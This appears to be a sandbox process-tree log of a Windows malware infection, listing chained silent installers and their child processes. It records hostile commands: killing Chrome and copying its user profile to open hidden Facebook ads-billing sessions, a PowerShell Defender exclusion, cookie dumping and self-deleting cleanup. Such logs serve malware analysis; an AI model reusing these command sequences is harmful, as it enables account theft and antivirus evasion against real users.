C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2332 /prefetch:845⤵PID:2068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:145⤵PID:7860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:145⤵PID:7192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:145⤵PID:8616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:145⤵PID:10968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2568 /prefetch:145⤵PID:10772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4600 /prefetch:845⤵PID:10544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4468 /prefetch:845⤵PID:11960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:145⤵PID:10372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:145⤵PID:4248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:145⤵PID:10084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5772 /prefetch:845⤵PID:13180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1500 /prefetch:845⤵PID:13732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5480 /prefetch:845⤵PID:13968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5796 /prefetch:845⤵PID:13564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2996 /prefetch:845⤵PID:12204
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5lvlsbjioac\vict.exe"C:\Users\Admin\AppData\Local\Temp\5lvlsbjioac\vict.exe" /VERYSILENT /id=53543⤵PID:11728
-
C:\Users\Admin\AppData\Local\Temp\is-UQKHV.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-UQKHV.tmp\vict.tmp" /SL5="$A044C,870426,780800,C:\Users\Admin\AppData\Local\Temp\5lvlsbjioac\vict.exe" /VERYSILENT /id=53544⤵PID:10528
-
C:\Users\Admin\AppData\Local\Temp\is-GMD85.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-GMD85.tmp\wimapi.exe" 53545⤵PID:9432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0i513flnalv\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\0i513flnalv\Setup3310.exe" /Verysilent /subid=57743⤵PID:10392
-
C:\Users\Admin\AppData\Local\Temp\is-THP63.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-THP63.tmp\Setup3310.tmp" /SL5="$8043A,802346,56832,C:\Users\Admin\AppData\Local\Temp\0i513flnalv\Setup3310.exe" /Verysilent /subid=57744⤵PID:8892
-
C:\Users\Admin\AppData\Local\Temp\is-SALDT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SALDT.tmp\Setup.exe" /Verysilent45⤵PID:11976
-
C:\Users\Admin\AppData\Local\Temp\is-Q2FUJ.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q2FUJ.tmp\Setup.tmp" /SL5="$30624,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-SALDT.tmp\Setup.exe" /Verysilent46⤵PID:4164
-
C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\PictureLAb.exe" /Verysilent47⤵PID:6484
-
C:\Users\Admin\AppData\Local\Temp\is-N3RQ4.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-N3RQ4.tmp\PictureLAb.tmp" /SL5="$B0410,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\PictureLAb.exe" /Verysilent48⤵PID:8304
-
C:\Users\Admin\AppData\Local\Temp\is-NT0IE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NT0IE.tmp\Setup.exe" /VERYSILENT49⤵PID:10640
-
C:\Users\Admin\AppData\Local\Temp\is-410VO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-410VO.tmp\Setup.tmp" /SL5="$208F0,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-NT0IE.tmp\Setup.exe" /VERYSILENT50⤵PID:11508
-
C:\Users\Admin\AppData\Local\Temp\is-8NVH5.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-8NVH5.tmp\def.exe" /S /UID=lab21451⤵PID:6364
-
C:\Users\Admin\AppData\Local\Temp\61-fb3c8-aa4-43abd-3c2742d33cba2\Paelelushako.exe"C:\Users\Admin\AppData\Local\Temp\61-fb3c8-aa4-43abd-3c2742d33cba2\Paelelushako.exe"52⤵PID:9308
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nifqcsri.ygp\lod.exe & exit53⤵PID:9900
-
C:\Users\Admin\AppData\Local\Temp\nifqcsri.ygp\lod.exeC:\Users\Admin\AppData\Local\Temp\nifqcsri.ygp\lod.exe54⤵PID:5960
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ55⤵PID:7012
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt55⤵PID:12304
-
C:\Windows\SysWOW64\cmd.execmd56⤵PID:13128
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sp5ckqgn.2tw\customer4.exe & exit53⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\sp5ckqgn.2tw\customer4.exeC:\Users\Admin\AppData\Local\Temp\sp5ckqgn.2tw\customer4.exe54⤵PID:12344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0ui04qf.ap5\askinstall18.exe & exit53⤵PID:8156
-
C:\Users\Admin\AppData\Local\Temp\w0ui04qf.ap5\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\w0ui04qf.ap5\askinstall18.exe54⤵PID:12524
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe55⤵PID:11408
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe56⤵
- Kills process with taskkill
PID:11708
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y55⤵PID:2476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/55⤵PID:13988
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2056⤵PID:14032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,109271281434743225,9644607890444750015,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1668 /prefetch:856⤵PID:13716
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iedn4gjs.l3o\md7_7dfj.exe & exit53⤵PID:12472
-
C:\Users\Admin\AppData\Local\Temp\iedn4gjs.l3o\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\iedn4gjs.l3o\md7_7dfj.exe54⤵PID:8232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mkl1bbjr.zrm\privacytools5.exe & exit53⤵PID:12820
-
C:\Users\Admin\AppData\Local\Temp\mkl1bbjr.zrm\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\mkl1bbjr.zrm\privacytools5.exe54⤵PID:10352
-
C:\Users\Admin\AppData\Local\Temp\mkl1bbjr.zrm\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\mkl1bbjr.zrm\privacytools5.exe55⤵PID:13524
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jik2rb4j.c0n\GcleanerWW.exe /mixone & exit53⤵PID:12428
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qqyx3awr.nzw\setup.exe /8-2222 & exit53⤵PID:13704
-
C:\Users\Admin\AppData\Local\Temp\qqyx3awr.nzw\setup.exeC:\Users\Admin\AppData\Local\Temp\qqyx3awr.nzw\setup.exe /8-222254⤵PID:14168
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Morning-Water"55⤵PID:13488
-
-
C:\Program Files (x86)\Morning-Water\7za.exe"C:\Program Files (x86)\Morning-Water\7za.exe" e -p154.61.71.51 winamp-plugins.7z55⤵PID:12908
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Morning-Water\setup.exe" -map "C:\Program Files (x86)\Morning-Water\WinmonProcessMonitor.sys""55⤵PID:14288
-
C:\Program Files (x86)\Morning-Water\setup.exe"C:\Program Files (x86)\Morning-Water\setup.exe" -map "C:\Program Files (x86)\Morning-Water\WinmonProcessMonitor.sys"56⤵PID:10164
-
-
-
C:\Program Files (x86)\Morning-Water\7za.exe"C:\Program Files (x86)\Morning-Water\7za.exe" e -p154.61.71.51 winamp.7z55⤵PID:11000
-
-
C:\Program Files (x86)\Morning-Water\setup.exe"C:\Program Files (x86)\Morning-Water\setup.exe" /8-222255⤵PID:13140
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qls3ez00.fiu\MultitimerFour.exe & exit53⤵PID:13928
-
C:\Users\Admin\AppData\Local\Temp\qls3ez00.fiu\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\qls3ez00.fiu\MultitimerFour.exe54⤵PID:9348
-
C:\Users\Admin\AppData\Local\Temp\1BRA7AESJ7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1BRA7AESJ7\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10455⤵PID:11272
-
C:\Users\Admin\AppData\Local\Temp\1BRA7AESJ7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1BRA7AESJ7\multitimer.exe" 1 3.1615300247.6047869793ffa 10456⤵PID:10340
-
C:\Users\Admin\AppData\Local\Temp\1BRA7AESJ7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1BRA7AESJ7\multitimer.exe" 2 3.1615300247.6047869793ffa57⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\0gbp4xjsa2b\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\0gbp4xjsa2b\askinstall24.exe"58⤵PID:10608
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe59⤵PID:6180
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe60⤵
- Kills process with taskkill
PID:2120
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y59⤵PID:6844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/59⤵PID:4940
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xbc,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2060⤵PID:13540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,16457182517323392483,1781057627565176141,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1636 /prefetch:860⤵PID:11908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4e3dmift0ni\vict.exe"C:\Users\Admin\AppData\Local\Temp\4e3dmift0ni\vict.exe" /VERYSILENT /id=53558⤵PID:9316
-
C:\Users\Admin\AppData\Local\Temp\is-7S51T.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-7S51T.tmp\vict.tmp" /SL5="$10C96,870426,780800,C:\Users\Admin\AppData\Local\Temp\4e3dmift0ni\vict.exe" /VERYSILENT /id=53559⤵PID:7220
-
C:\Users\Admin\AppData\Local\Temp\is-P9F4U.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-P9F4U.tmp\wimapi.exe" 53560⤵PID:7376
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wgi4lg0wbyw\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\wgi4lg0wbyw\Setup3310.exe" /Verysilent /subid=57758⤵PID:4576
-
C:\Users\Admin\AppData\Local\Temp\is-Q9UTN.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q9UTN.tmp\Setup3310.tmp" /SL5="$E085A,802346,56832,C:\Users\Admin\AppData\Local\Temp\wgi4lg0wbyw\Setup3310.exe" /Verysilent /subid=57759⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\is-855PM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-855PM.tmp\Setup.exe" /Verysilent60⤵PID:7720
-
C:\Users\Admin\AppData\Local\Temp\is-IGIN7.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IGIN7.tmp\Setup.tmp" /SL5="$60C32,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-855PM.tmp\Setup.exe" /Verysilent61⤵PID:11084
-
C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\PictureLAb.exe" /Verysilent62⤵PID:9348
-
C:\Users\Admin\AppData\Local\Temp\is-R41LO.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-R41LO.tmp\PictureLAb.tmp" /SL5="$90CE4,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\PictureLAb.exe" /Verysilent63⤵PID:4160
-
C:\Users\Admin\AppData\Local\Temp\is-9D7HJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9D7HJ.tmp\Setup.exe" /VERYSILENT64⤵PID:11836
-
C:\Users\Admin\AppData\Local\Temp\is-32H9M.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-32H9M.tmp\Setup.tmp" /SL5="$30F66,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-9D7HJ.tmp\Setup.exe" /VERYSILENT65⤵PID:13864
-
C:\Users\Admin\AppData\Local\Temp\is-DS74M.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-DS74M.tmp\def.exe" /S /UID=lab21466⤵PID:9364
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\Delta.exe" /Verysilent62⤵PID:11552
-
C:\Users\Admin\AppData\Local\Temp\is-1MEJU.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-1MEJU.tmp\Delta.tmp" /SL5="$40DF0,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\Delta.exe" /Verysilent63⤵PID:12660
-
C:\Users\Admin\AppData\Local\Temp\is-GF4FQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GF4FQ.tmp\Setup.exe" /VERYSILENT64⤵PID:11412
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-GF4FQ.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit65⤵PID:13176
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f66⤵
- Kills process with taskkill
PID:14980
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\zznote.exe" /Verysilent62⤵PID:6756
-
C:\Users\Admin\AppData\Local\Temp\is-H5199.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-H5199.tmp\zznote.tmp" /SL5="$50DF0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\zznote.exe" /Verysilent63⤵PID:11852
-
C:\Users\Admin\AppData\Local\Temp\is-PIFBF.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-PIFBF.tmp\jg4_4jaa.exe" /silent64⤵PID:14504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-8T551.tmp\hjjgaa.exe" /Verysilent62⤵PID:13712
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt63⤵PID:15256
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt63⤵PID:11484
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yncygsxb124\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\yncygsxb124\chashepro3.exe" /VERYSILENT58⤵PID:12532
-
C:\Users\Admin\AppData\Local\Temp\is-IPH3U.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-IPH3U.tmp\chashepro3.tmp" /SL5="$80B64,1478410,58368,C:\Users\Admin\AppData\Local\Temp\yncygsxb124\chashepro3.exe" /VERYSILENT59⤵PID:11652
-
-
-
C:\Users\Admin\AppData\Local\Temp\2yo4bebs1rc\j2vzm2vztod.exe"C:\Users\Admin\AppData\Local\Temp\2yo4bebs1rc\j2vzm2vztod.exe" /ustwo INSTALL58⤵PID:12464
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "j2vzm2vztod.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2yo4bebs1rc\j2vzm2vztod.exe" & exit59⤵PID:13376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "j2vzm2vztod.exe" /f60⤵
- Kills process with taskkill
PID:13932
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kepbaxjw1f4\app.exe"C:\Users\Admin\AppData\Local\Temp\kepbaxjw1f4\app.exe" /8-2358⤵PID:12072
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wandering-Glade"59⤵PID:11028
-
-
C:\Program Files (x86)\Wandering-Glade\7za.exe"C:\Program Files (x86)\Wandering-Glade\7za.exe" e -p154.61.71.51 winamp-plugins.7z59⤵PID:13956
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wandering-Glade\app.exe" -map "C:\Program Files (x86)\Wandering-Glade\WinmonProcessMonitor.sys""59⤵PID:13792
-
C:\Program Files (x86)\Wandering-Glade\app.exe"C:\Program Files (x86)\Wandering-Glade\app.exe" -map "C:\Program Files (x86)\Wandering-Glade\WinmonProcessMonitor.sys"60⤵PID:6908
-
-
-
C:\Program Files (x86)\Wandering-Glade\7za.exe"C:\Program Files (x86)\Wandering-Glade\7za.exe" e -p154.61.71.51 winamp.7z59⤵PID:9136
-
-
C:\Program Files (x86)\Wandering-Glade\app.exe"C:\Program Files (x86)\Wandering-Glade\app.exe" /8-2359⤵PID:13532
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\Delta.exe" /Verysilent47⤵PID:12368
-
C:\Users\Admin\AppData\Local\Temp\is-OU0QS.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-OU0QS.tmp\Delta.tmp" /SL5="$D0410,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\Delta.exe" /Verysilent48⤵PID:12004
-
C:\Users\Admin\AppData\Local\Temp\is-AKOVH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AKOVH.tmp\Setup.exe" /VERYSILENT49⤵PID:13436
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-AKOVH.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit50⤵PID:6768
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f51⤵
- Kills process with taskkill
PID:13620
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\zznote.exe" /Verysilent47⤵PID:13516
-
C:\Users\Admin\AppData\Local\Temp\is-UH45D.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-UH45D.tmp\zznote.tmp" /SL5="$20C5C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\zznote.exe" /Verysilent48⤵PID:13628
-
C:\Users\Admin\AppData\Local\Temp\is-JPA2U.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-JPA2U.tmp\jg4_4jaa.exe" /silent49⤵PID:6560
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-F07K0.tmp\hjjgaa.exe" /Verysilent47⤵PID:12104
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt48⤵PID:13764
-
-
